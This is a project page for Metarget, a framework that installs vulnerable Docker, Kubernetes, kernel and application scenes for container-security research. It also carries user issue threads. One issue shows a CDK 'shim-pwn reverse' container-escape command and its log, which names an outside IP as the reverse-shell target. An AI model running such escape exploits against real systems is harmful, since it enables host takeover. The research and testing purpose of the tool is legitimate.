framework providing automatic constructions of vulnerable infrastructures

Related tags

DevOps Tools kubernetes container target cloud-native vulnerabilities container-security kubernetes-security container-escape cloud-native-security vulnerable-infrastructure
Overview

metarget-logo

中文 | English

1 Introduction

Metarget = meta- + target, a framework providing automatic constructions of vulnerable infrastructures, used to deploy simple or complicated vulnerable cloud native targets swiftly and automatically.

1.1 Why Metarget?

During security researches, we might find that the deployment of vulnerable environment often takes much time, while the time spent on testing PoC or ExP is comparatively short. In the field of cloud native security, thanks to the complexity of cloud native systems, this issue is more terrible.

There are already some excellent security projects like Vulhub, VulApps in the open-source community, which pack vulnerable scenes into container images, so that researchers could utilize them and deploy scenes quickly.

However, these projects mainly focus on vulnerabilities in applications. What if we need to study the vulnerabilities in the infrastructures like Docker, Kubernetes and even Linux kernel?

Hence, we develop Metarget and hope to solve the deployment issue above to some extent. Furthermore, we also expect that Metarget could help to construct multilayer vulnerable cloud native scenes automatically.

1.2 Install Vulnerability!

In this project, we come up with concepts like installing vulnerabilities and installing vulnerable scenes. Why not install vulnerabilities just like installing softwares? We can do that, because our goals are security research and offensive security.

To be exact, we expect that:

  • metarget cnv install cve-2019-5736 will install Docker with CVE-2019-5736 onto the server.
  • metarget cnv install cve-2018-1002105 will install Kubernetes with CVE-2018-1002105 onto the server.
  • metarget cnv install kata-escape-2020 will install Kata-containers with CVE-2020-2023/2025/2026 onto the server.
  • metarget cnv install cve-2016-5195 will install a kernel with DirtyCoW into the server.

It's cool, right? No more steps. No RTFM. Execute one command and enjoy your coffee.

Furthermore, we expect that:

  • with Metarget's help, ethical hackers are able to deploy simple or complicated cloud native targets swiftly and learn by hacking cloud native environments.
  • metarget appv install dvwa will install a DVWA target onto our vulnerable infrastructure.
  • metarget appv install thinkphp-5-0-23-rce --external will install a ThinkPHP RCE vulnerability with NodePort service onto our vulnerable infrastructure.

You can just run 5 commands below after installing a new Ubuntu and obtain a multi-layer vulnerable scene:

./metarget cnv install cve-2016-5195 # container escape with dirtyCoW
./metarget cnv install cve-2019-5736 # container escape with docker
./metarget cnv install cve-2018-1002105 # kubernetes single-node cluster with cve-2018-1002105
./metarget cnv install privileged-container # deploy a privileged container
./metarget appv install dvwa --external # deploy dvwa target

RCE, container escape, lateral movement, persistence, they are yours now.

More awesome functions are coming! Stay tuned :)

Note:

Thie project aims to provide vulnerable scenes for security research. The security of scenes generated is not guaranteed. It is NOT recommended to deploy components or scenes with Metarget on the Internet.

2 Usage

2.1 Basic Usage

usage: metarget [-h] [-v] subcommand ...

automatic constructions of vulnerable infrastructures

positional arguments:
  subcommand     description
    gadget       cloud native gadgets (docker/k8s/...) management
    cnv          cloud native vulnerabilities management
    appv         application vulnerabilities management

optional arguments:
  -h, --help     show this help message and exit
  -v, --version  show program's version number and exit

Run ./metarget gadget list to see cloud native components supported currently.

2.2 Manage Cloud Native Components

usage: metarget gadget [-h] subcommand ...

positional arguments:
  subcommand  description
    list      list supported gadgets
    install   install gadgets
    remove    uninstall gadgets

optional arguments:
  -h, --help  show this help message and exit

2.2.1 Case: Install Docker with Specified Version

Run:

./metarget gadget install docker --version 18.03.1

If the command above completes successfully, 18.03.1 Docker will be installed.

2.2.2 Case: Install Kubernetes with Specified Version

Run:

./metarget gadget install k8s --version 1.16.5

If the command above completes successfully, 1.16.5 Kubernetes single-node cluster will be installed.

Note:

Usually, lots of options need to be configured in Kubernetes. As a security research project, Metarget provides some options for installation of Kubernetes:

  -v VERSION, --version VERSION
                        gadget version
  --cni-plugin CNI_PLUGIN
                        cni plugin, flannel by default
  --pod-network-cidr POD_NETWORK_CIDR
                        pod network cidr, default cidr for each plugin by
                        default
  --taint-master        taint master node or not

Metarget supports deployment of multi-node cluster. If you want to add more nodes into the cluster, you can copy tools/install_k8s_worker.sh script and run it on each worker nodes after the successful installation of single-node cluster.

2.2.3 Case: Install Kata-containers with Specified Version

Run:

./metarget gadget install kata --version 1.10.0

If the command above completes successfully, 1.10.0 Kata-containers will be installed.

Note:

You can also specify the type of kata runtime (qemu/clh/fc/...) with --kata-runtime-type option, which is qemu by default.

2.2.4 Case: Install Linux Kernel with Specified Version

Run:

./metarget gadget install kernel --version 5.7.5

If the command above completes successfully, 5.7.5 kernel will be installed.

Note:

Currently, Metarget install kernels in 2 ways:

  1. apt
  2. if apt package is not available, download *.deb remotely from Ubuntu and try to install

After successful installation of kernel, reboot of system is needed. Metarget will prompt to reboot automatically.

2.3 Manage Vulnerable Scenes Related to Cloud Native Components

usage: metarget cnv [-h] subcommand ...

positional arguments:
  subcommand  description
    list      list supported cloud native vulnerabilities
    install   install cloud native vulnerabilities
    remove    uninstall cloud native vulnerabilities

optional arguments:
  -h, --help  show this help message and exit

Run ./metarget cnv list to see vulnerable scenes related to cloud native components supported currently.

2.3.1 Case: CVE-2019-5736

Run:

./metarget cnv install cve-2019-5736

If the command above completes successfully, Docker with CVE-2019-5736 will be installed。

2.3.2 Case: CVE-2018-1002105

Run:

./metarget cnv install cve-2018-1002105

If the command above completes successfully, Kubernetes with CVE-2018-1002105 will be installed。

2.3.3 Case: Kata-containers Escape

Run:

./metarget cnv install kata-escape-2020

If the command above completes successfully, Kata-containers with CVE-2020-2023/2025/2026 will be installed。

2.3.4 Case: CVE-2016-5195

Run:

./metarget cnv install cve-2016-5195

If the command above completes successfully, kernel with CVE-2016-5195 will be installed。

2.4 Manage Vulnerable Scenes Related to Cloud Native Applications

usage: metarget appv [-h] subcommand ...

positional arguments:
  subcommand  description
    list      list supported application vulnerabilities
    install   install application vulnerabilities
    remove    uninstall application vulnerabilities

optional arguments:
  -h, --help  show this help message and exit

Run ./metarget appv list to see vulnerable scenes related to cloud native applications supported currently.

Note:

Before deploying application vulnerable scenes, you should install Docker and Kubernetes firstly. You can use Metarget to install Docker and Kubernetes.

2.4.1 Case: DVWA

Run:

./metarget appv install dvwa

If the command above completes successfully, DVWA will be deployed as Deployment and Service resources in current Kubernetes.

Note:

You can specify --external option, then the service will be exposed as NodePort, so that you can visit it by IP of the host node.

By default, the type of service is ClusterIP.

2.5 Manage Vulnerable Cloud Native Target Cluster

Developing, currently not supported.

3 Installation

3.1 Requirements

  • Ubuntu 16.04 or 18.04
  • Python >= 3.5
  • pip3

3.2 From Source

Clone the repository and install requirements:

git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip install -r requirements.txt

Begin to use Metarget and construct vulnerable scenes. For example:

./metarget cnv install cve-2019-5736

3.3 From PyPI

Currently unsupported.

4 Scene List

4.1 Vulnerable Scenes Related to Cloud Native Components

Name Class Type Status
cve-2018-15664 docker container_escape
cve-2019-13139 docker command_execution
cve-2019-14271 docker container_escape
cve-2020-15257 docker/containerd container_escape
cve-2019-5736 docker/runc container_escape
cve-2017-1002101 kubernetes container_escape
cve-2018-1002105 kubernetes privilege_escalation
cve-2019-11253 kubernetes denial_of_service
cve-2019-9512 kubernetes denial_of_service
cve-2019-9514 kubernetes denial_of_service
cve-2020-8554 kubernetes man_in_the_middle
cve-2020-8558 kubernetes exposure_of_service
cve-2016-5195 kernel container_escape
cve-2020-14386 kernel container_escape
cap_dac_read_search-container config container_escape
cap_sys_admin-container config container_escape
cap_sys_ptrace-container config container_escape
privileged-container config container_escape
mount-docker-sock mount container_escape
mount-host-etc mount container_escape
mount-host-procfs mount container_escape
kata-escape-2020 kata-containers container_escape

4.2 Vulnerable Scenes Related to Cloud Native Applications

These scenes are mainly derived from other open-source projects:

We express sincere gratitude to projects above!

Metarget converts scenes in projects above to Deployments and Services resources in Kubernetes (thanks to kompose).

To list vulnerable scenes related to cloud native applications supported by Metarget, just run:

./metarget appv list

5 DEMO

asciicast

6 Development Plan

  • deployments of basic cloud native components (docker, k8s)
  • integrations of vulnerable scenes related to cloud native components
  • integrations of RCE scenes in containers
  • automatic construction of multi-node cloud native target cluster
  • integrations of other cloud native vulnerable scenes (long term)

7 About Logo

It is not a Kubernetes, but a vulnerable infrastructure with three gears which could not work well (vulnerable) :)

Comments
  • meet some Error when install cve-2018-1002105

    meet some Error when install cve-2018-1002105

    when i use this command " ./metarget cnv install cve-2018-1002105 --domestic ",and the output get to " running kubeadm " ,I meet some Error. The Error is flowing: 捕获

    Really hope someone can help me ,thanks

    opened by painsAgains 4
  • 配置cve-2020-15257的小问题

    配置cve-2020-15257的小问题

    在Ubuntu18.04和16.04分别搭建过环境,最后结果都下面所示,Linux内核版本是5.8.0-59-generic

    sudo ./metarget cnv install cve-2020-15257 --verbose
cve-2020-15257 is going to be installed
uninstalling current docker gadgets if applicable
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
The following packages will be REMOVED:
  docker-ce
0 upgraded, 0 newly installed, 1 to remove and 444 not upgraded.
After this operation, 181 MB disk space will be freed.
(Reading database ... 133309 files and directories currently installed.)
Removing docker-ce (18.03.1~ce~3-0~ubuntu) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'docker' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'docker-engine' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'docker.io' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'containerd' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'runc' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
installing prerequisites
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease          
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                  
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                   
Hit:5 http://archive.ubuntu.com/ubuntu xenial-updates InRelease                                               
Hit:6 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Hit:7 https://download.docker.com/linux/ubuntu bionic InRelease
Reading package lists... Done         
Reading package lists... Done
Building dependency tree       
Reading state information... Done
ca-certificates is already the newest version (20210119~18.04.1).
software-properties-common is already the newest version (0.96.24.32.14).
apt-transport-https is already the newest version (1.6.13).
gnupg-agent is already the newest version (2.2.4-1ubuntu1.4).
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
adding apt repository deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable
OK
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                     
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                   
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
adding apt repository deb http://archive.ubuntu.com/ubuntu xenial-updates universe
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                               
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                             
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
adding apt repository deb http://archive.ubuntu.com/ubuntu bionic-updates universe
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                     
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                                             
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                                               
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                                             
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
installing docker-ce with 18.03.1~ce~3-0~ubuntu version
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  docker-ce
0 upgraded, 1 newly installed, 0 to remove and 444 not upgraded.
Need to get 0 B/33.9 MB of archives.
After this operation, 181 MB of additional disk space will be used.
Selecting previously unselected package docker-ce.
(Reading database ... 133095 files and directories currently installed.)
Preparing to unpack .../docker-ce_18.03.1~ce~3-0~ubuntu_amd64.deb ...
Unpacking docker-ce (18.03.1~ce~3-0~ubuntu) ...
Setting up docker-ce (18.03.1~ce~3-0~ubuntu) ...
Processing triggers for ureadahead (0.100.0-21) ...
Processing triggers for systemd (237-3ubuntu10.24) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
warning: no candidate version for containerd
warning: docker seems to be installed, but some errors happened during installation
cve-2020-15257 successfully installed

    安装成功,但是显示有warning

    然后按照Writeup的方式去复现,可以找到抽象命名空间的套接字。但是在进行exploit时发现结果如下所示:

    root@ubuntu:/tmp# run shim-pwn reverse xx.xx.xx.xx 1234
bash: run: command not found
root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
2021/06/28 07:55:31 tring to spawn shell to 49.232.1.8:1234
2021/06/28 07:55:31 try socket: @/containerd-shim/moby/b2d38375588b3b988f9010ce551d785a2bdb37a497aed068c8482b0776af2910/shim.sock
2021/06/28 07:55:31 rpc error response.:
rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
2021/06/28 07:55:31 exploit failed.

    报错信息显示runc不在PATH路径下,执行runc提示需要安装。发现实际上安装的runc可执行文件为docker-runc,创建软链接后利用成功。

    似乎如果系统安装过docker,再利用metarget安装漏洞环境就会导致runc的名称问题。不知道这属不属于bug,或许在writeup上可以做下标注?

    bug 
    opened by duowen1 3
  • CVE-2022-0492 cannot deploy, ubuntu kernel 5.8 has been patehed

    CVE-2022-0492 cannot deploy, ubuntu kernel 5.8 has been patehed

    opened by awslshadowstar 2
  • ./metarget cnv list的时候报错,求解

    ./metarget cnv list的时候报错,求解

    Traceback (most recent call last): File "./metarget", line 250, in main() File "./metarget", line 243, in main args.func(args) File "/home/vivoadmin/metarget-master/cmds/cnv.py", line 254, in retrieve vulns = vuln_loader.load_vulns_by_dir(config.vuln_cn_dir_wildcard) File "/home/vivoadmin/metarget-master/core/vuln_cn_manager/vuln_loader.py", line 48, in load_vulns_by_dir return load_vulns(vuln_files) File "/home/vivoadmin/metarget-master/core/vuln_cn_manager/vuln_loader.py", line 39, in load_vulns vuln = load_vuln(f) File "/home/vivoadmin/metarget-master/core/vuln_cn_manager/vuln_loader.py", line 26, in load_vuln vuln = yaml.load(f, Loader=yaml.SafeLoader) File "/usr/lib/python3/dist-packages/yaml/init.py", line 70, in load loader = Loader(stream) File "/usr/lib/python3/dist-packages/yaml/loader.py", line 24, in init Reader.init(self, stream) File "/usr/lib/python3/dist-packages/yaml/reader.py", line 85, in init self.determine_encoding() File "/usr/lib/python3/dist-packages/yaml/reader.py", line 135, in determine_encoding self.update(1) File "/usr/lib/python3/dist-packages/yaml/reader.py", line 169, in update self.check_printable(data) File "/usr/lib/python3/dist-packages/yaml/reader.py", line 144, in check_printable 'unicode', "special characters are not allowed") yaml.reader.ReaderError: unacceptable character #x0088: special characters are not allowed in "vulns_cn/kernel/cve-2022-0185.yaml", position 304 有人遇到过这个吗? 不知道怎么解决欸

    opened by fog895559 2
  • 增加了一个简化版的readme文件

    增加了一个简化版的readme文件

    感谢指出问题,做个简要回答:

    1. 在本地运行exp后执行ps -aux没有任何异常,可以看到host上所有进程。不知道shell崩溃退出的原因是否是因为没有挂载/proc伪文件系统;
    2. 我自己也感受到了writeup的冗长和杂乱无章,这个writeup主要是我自己在复现的时候做的笔记,当时是希望将每个点都讲清楚。对于内核的漏洞来讲,涉及到的知识面非常多,而且要求研究者对内核很多机制有较深的理解,我主要翻译了国外大神的分析,结合了我对内核、容器的思考。但是囿于自己的表达能力,整体的逻辑可能比较欠缺。但同时如果做到逻辑完整,那么篇幅就会很长。

    重新写了一版的writeup,标题层次如下,并且大量删除了大量内容。

    Linux内核漏洞导致容器逃逸(CVE-2017-7308)
    场景介绍
    背景知识
    漏洞详情
        漏洞分析
        漏洞利用
    环境搭建
    漏洞复现
    参考文献
    opened by duowen1 2
  • Install cve-2017-7308,error: kernel package list not found.

    Install cve-2017-7308,error: kernel package list not found.

    Hey, it's me again. I was installing cve-2017-7308. I firstly ran git pull to get my metarget update to your registry. And I ran ./metarget cnv install cve-2017-7308, then the output is:

    cve-2017-7308 is going to be installed
switching kernel by version
adding apt repository deb http://security.ubuntu.com/ubuntu trusty-security main
adding apt repository deb http://security.ubuntu.com/ubuntu xenial-security main
adding apt repository deb http://security.ubuntu.com/ubuntu bionic-security main
warning: no apt package for kernel 4.8.0-34
switching kernel version with downloading packages
retrieving package list for kernel 4.8.0-34
error: kernel package list not found
error: failed to install cve-2017-7308

    My kernel version is 5.0.0-23-generic, and my operating system is Ubuntu 18.04.

    opened by duowen1 2
  • 下载内核漏洞cve-2020-14386 显示/tmp是一个文件夹

    下载内核漏洞cve-2020-14386 显示/tmp是一个文件夹

    执行命令sudo ./metarget cnv install cve-2020-14386,python异常输出如下:

    Traceback (most recent call last):
  File "./metarget", line 231, in <module>
    main()
  File "./metarget", line 224, in main
    args.func(args)
  File "/home/user/Desktop/metarget/cmds/cnv.py", line 136, in install
    gadgets=vuln['dependencies'], verbose=args.verbose):
  File "/home/user/Desktop/metarget/core/env_managers/kernel_installer.py", line 54, in install_by_version
    version, verbose=verbose)
  File "/home/user/Desktop/metarget/core/env_managers/kernel_installer.py", line 86, in _install_by_version_with_download
    cls.download_file(deb, config.kernel_packages_dir)
  File "/home/user/Desktop/metarget/core/env_managers/installer.py", line 300, in download_file
    with open(dst, 'wb') as f:
IsADirectoryError: [Errno 21] Is a directory: '/tmp'

    原因是字符串dst此时为'/tmp',是一个目录。修改metarget/core/env_managers/installer.py第299行:

    原代码

    dst=save_path

    修改后

    dst=save_path+'/'+url.split('/')[-1]
    bug 
    opened by duowen1 1
  • Project dependencies may have API risk issues

    Project dependencies may have API risk issues

    Hi, In metarget, inappropriate dependency versioning constraints can cause risks.

    Below are the dependencies and version constraints that the project is using

    PyYaml
docker==5.0.0
packaging
requests
beautifulsoup4
tqdm
prettytable==1.0.1

    The version constraint == will introduce the risk of dependency conflicts because the scope of dependencies is too strict. The version constraint No Upper Bound and * will introduce the risk of the missing API Error because the latest version of the dependencies may remove some APIs.

    After further analysis, in this project, The version constraint of dependency packaging can be changed to >=14.1,<=21.3. The version constraint of dependency requests can be changed to >=0.2.1,<=0.2.3. The version constraint of dependency requests can be changed to >=0.7.0,<=2.24.0. The version constraint of dependency requests can be changed to ==2.26.0. The version constraint of dependency beautifulsoup4 can be changed to >=4.10.0,<=4.11.1. The version constraint of dependency tqdm can be changed to >=4.36.0,<=4.64.0. The version constraint of dependency prettytable can be changed to >=0.6,<=1.0.1.

    The above modification suggestions can reduce the dependency conflicts as much as possible, and introduce the latest version as much as possible without calling Error in the projects.

    The invocation of the current project includes all the following methods.

    The calling methods from the packaging 
    packaging.version.parse
    The calling methods from the requests 
    requests.get
    The calling methods from the beautifulsoup4 
    bs4.BeautifulSoup
    The calling methods from the tqdm 
    tqdm.tqdm
    The calling methods from the prettytable 
    prettytable.PrettyTable
prettytable.PrettyTable.add_row
prettytable.PrettyTable.get_string
    The calling methods from the all methods 
    core.env_managers.cni_plugin_installer.CNIPluginInstaller.install_cni_plugin
utils.checkers.docker_specified_installed
cls._get_kubeadm_token_and_hash
vuln.get
version.rstrip.endswith
cls._act
flask.redirect
dict.keys
fw.write
version_string.re.search.group.startswith
int
flask.render_template_string
res.stdout.decode.split.pop
flask.Flask.route
res.stdout.decode
core.env_managers.docker_installer.DockerInstaller.uninstall
os.path.join
CNIPluginInstaller._install_flannel
pathlib.Path.unlink
flask.Flask.run
print
utils.checkers.kata_specified_installed
filename.re.search.group
re.search
core.env_managers.kubernetes_installer.KubernetesInstaller.uninstall
cls._pull_image
utils.filters.filter_vuln_by_name.startswith
subprocess.run
res.stdout.decode.split
yaml.load.keys
PIL.Image.open
pathlib.Path.exists
package_name.lstrip
debug_input
re.sub
tr.a.get_text.startswith
deb.split
DockerInstaller.install_by_version
cls._pre_configure
cls._pre_install
open
res.headers.get
os.chown
cls._get_k8s_images_list
XXXInstaller.install_by_version
load_vulns
utils.filters.filter_vuln_by_name
sys.exit
operator.itemgetter
core.vuln_app_manager.resource_modifier.generate_deployments_with_modifications
cls.reload_and_restart_docker
cmds.internal.deploy_vuln_resources_in_k8s
filename.rsplit.lower
fr.read
KubernetesInstaller.uninstall
werkzeug.utils.secure_filename.rsplit
debug
mappings.items
core.env_managers.kubernetes_resource_deployer.KubernetesResourceDeployer.delete
version.rstrip.rstrip
temp_yaml.endswith
docker_installed
filter_name_by_regex
cls._install_with_context
cls.docker_client.images.get
yaml.endswith
context.get
utils.system.reboot_system
cls._pull_domestic_image
dict
os.readlink.split
entry.split.strip.sort
utils.color_print.debug_input
core.vuln_app_manager.port_manager.allocate_ports
obj_list.keys
input
yaml.dump
os.environ.get
KernelInstaller.install_by_version
core.env_managers.package_list_downloader.download_package_list
core.vuln_app_manager.vuln_loader.load_vulns_by_dir
str
utils.system.mkdir_if_not_exist
res.stdout.decode.split.startswith
version_table.find_all
core.env_managers.kata_containers_installer.KataContainersInstaller.uninstall
DockerInstaller.uninstall
utils.checkers.docker_kubernetes_installed
os.path.join.extend
show_table
bs4.BeautifulSoup
cls.docker_client.images.get.replace
cls._run_kubeadm
string.Template
pathlib.Path.mkdir
cls._modify_grub
cls.get_host_ip
glob.glob
cls._pull_images
docker.from_env
len
core.env_managers.kubernetes_installer.KubernetesInstaller.install_by_version
tqdm.tqdm
utils.checkers.containerd_specified_installed
core.env_managers.kernel_installer.KernelInstaller.install_by_version
utils.system.reload_daemon_config
services_using_ports.index
CNIPluginInstaller._install_calico
pathlib.Path
cls._pull_docker_image
KubernetesInstaller.install_by_version
load_vulns_by_dir
cls._get_kubernetes_cni_version
shutil.rmtree
cls._install_one_gadget_by_version
encode
re.match
collections.OrderedDict
yaml_path.split
split.append
_get_next_available_port
requests.get
copy.copy
KataContainersInstaller.install_by_version
copy.copy.append
utils.checkers.kernel_specified_installed
cls._install_by_version_with_apt
allowed_file
version_string.re.search.group
core.vuln_app_manager.resource_modifier.generate_svcs_with_clusterip_to_nodeport
core.vuln_cn_manager.vuln_loader.load_vulns_by_dir
XXXInstaller.uninstall
string.Template.safe_substitute
entry.get_text
PIL.Image.open.load
new_name.split
f.write
utils.color_print.warning
link_target.split.split
list.append
utils.color_print.debug
utils.checkers.gadget_in_gadgets
cls._pull_k8s_images
pathlib.Path.symlink_to
os.getcwd
ports_usage.append
werkzeug.utils.secure_filename
format.split
flask.Flask
k8s_version.re.search.group
cls._image_exist
prettytable.PrettyTable
server_string.re.search.group
flask.flash
cmds.internal.delete_vuln_resources_in_k8s
cls._pull_quay_image
config.k8s_hash_generator.format.split
entry.startswith
cls._get_apt_complete_package
yaml.load
prettytable.PrettyTable.add_row
pathlib.Path.touch
utils.color_print.error_and_exit
cls._apt_update
socket.socket.close
socket.socket.connect
core.env_managers.kata_containers_installer.KataContainersInstaller.install_by_version
depends.split
core.env_managers.docker_installer.DockerInstaller.install_by_version
cls._get_apt_complete_version
cls.download_file
tr.a.get_text
cls._is_version_available_in_apt
requests.get.iter_content
cls._get_k8s_images_list_by_version
cls._update_k8s_worker_script
utils.checkers.kubernetes_specified_installed
core.vuln_app_manager.port_manager.release_ports
load_vuln
shutil.copy
utils.checkers.docker_installed
kubernetes_installed
depend.split.split
os.getuid
dict.pop
depend.split
platform.dist
res.re.search.group
cls._fetch_package_list_by_version
services_using_ports.pop
depend.split.split.split
nl_print
cls._tag_image
utils.color_print.error
json.loads
list
repo_entry.format.split
release_ports
ports_usage.pop
cls.docker_client.images.get.tag
core.env_managers.kubernetes_resource_deployer.KubernetesResourceDeployer.apply
prettytable.PrettyTable.get_string
socket.socket.getsockname
format
f.read
os.readlink
mappings.pop
open.close
join
image_file.save
obj.values
utils.table.show_table
json.dumps
utils.verbose.verbose_output
cls._pull_domestic_images
cls._add_apt_repository
bs4.BeautifulSoup.find_all
CNIPluginInstaller._install_cilium
cls.docker_client.images.remove
os.path.split
packaging.version.parse
v.startswith
config.kata_tar_decompress_dest.format.split
gpg_url.format.split
cls._install_cni_plugin
cls._configure_docker_with_kata
action.format.split
set
download_package_list
cls._create_k8s_resources
cls._install_by_version_with_download
socket.socket
split
zip
image.format.split
get_img_size
allocate_ports
cls._config_auth
os.getgid
entry.split
f.read.strip
entry.split.strip
os.mkdir
grub_option.format.split
utils.system.create_file_if_not_exist
action.strip
ports_used_list.append
res.stdout.decode.strip
_get_gadget_version_from_gadgets
KataContainersInstaller.uninstall

    @developer Could please help me check this issue? May I pull a request to fix it? Thank you very much.

    opened by PyDeps 0
  • 默认设置的特性门控不适用部分版本的k8s

    默认设置的特性门控不适用部分版本的k8s

    你好,我在使用./metarget cnv install cve-2019-1002101 --verbose --domestic命令安装cve-2019-1002101漏洞场景时,安装后k8s没有成功启动,出现了下图报错,经过排查发现kubelet配置文件中设置了特性门控:--feature-gates SupportNodePidsLimit=false image

    这个漏洞环境安装的k8s版本为1.11.1,而这个设置适用开始于1.14版本,低版本下没有办法设置,导致kubelet服务暂停 参考链接:https://kubernetes.io/zh/docs/reference/command-line-tools-reference/feature-gates/#using-a-feature 删除这个配置后,重启kubelet,服务正常。

    bug 
    opened by t1Kun 0
  • 安装低版本docker依赖问题

    安装低版本docker依赖问题

    你好,我在使用./metarget gadget install docker --version 17.01 --verbose 命令安装17.01版本的docker时,提示安装成功,实际上并没有安装,后来发现是工具添加的docker依赖里面没有低版本的安装包,需要手动添加deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable 然后更新才可以手动安装18以下版本的docker环境

    这种情况出现在漏洞环境需要18以下的docker版本

    bug 
    opened by t1Kun 0
Releases(v0.9.1)

  • v0.9.1(Dec 31, 2021)

    In May 2020, Metarget was open-sourced and has been used by many cloud native security researchers since then. We also obtained lots of contributions from the community. Thank you!

    • adopt semantic versioning
    • some cnvs and appvs added
    • ...

    Stay tuned :)

    Source code(tar.gz)
    Source code(zip)

  • v0.5(Jun 3, 2021)

  • v0.4(May 19, 2021)

    • some bugs fixed; thanks to @duowen1 and @Kfzz1
    • now we start up to implement metarget target!
    • stay tuned for further updates and releases :)
    Source code(tar.gz)
    Source code(zip)

  • v0.3(May 7, 2021)

  • v0.2(Apr 28, 2021)

  • v0.1(Apr 25, 2021)

Owner
rambolized
IT Security Researcher
rambolized
GitHub
DataOps framework for Machine Learning projects.

Noronha DataOps Noronha is a Python framework designed to help you orchestrate and manage ML projects life-cycle. It hosts Machine Learning models ins

null 52 Oct 30, 2022
KivyPassword - A password generator using both Kivy framework and SQL in order to create a local database for users to generate strong passwords and store them

KivyPassword A password generator using both Kivy framework and SQL in order t

null 1 Jan 14, 2022
Colibri core is an NLP tool as well as a C++ and Python library for working with basic linguistic constructions such as n-grams and skipgrams (i.e patterns with one or more gaps, either of fixed or dynamic size) in a quick and memory-efficient way. At the core is the tool ``colibri-patternmodeller`` whi ch allows you to build, view, manipulate and query pattern models.

Colibri Core by Maarten van Gompel, [email protected], Radboud University Nijmegen Licensed under GPLv3 (See http://www.gnu.org/licenses/gpl-3.0.html

Maarten van Gompel 122 Nov 17, 2022
Providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account.

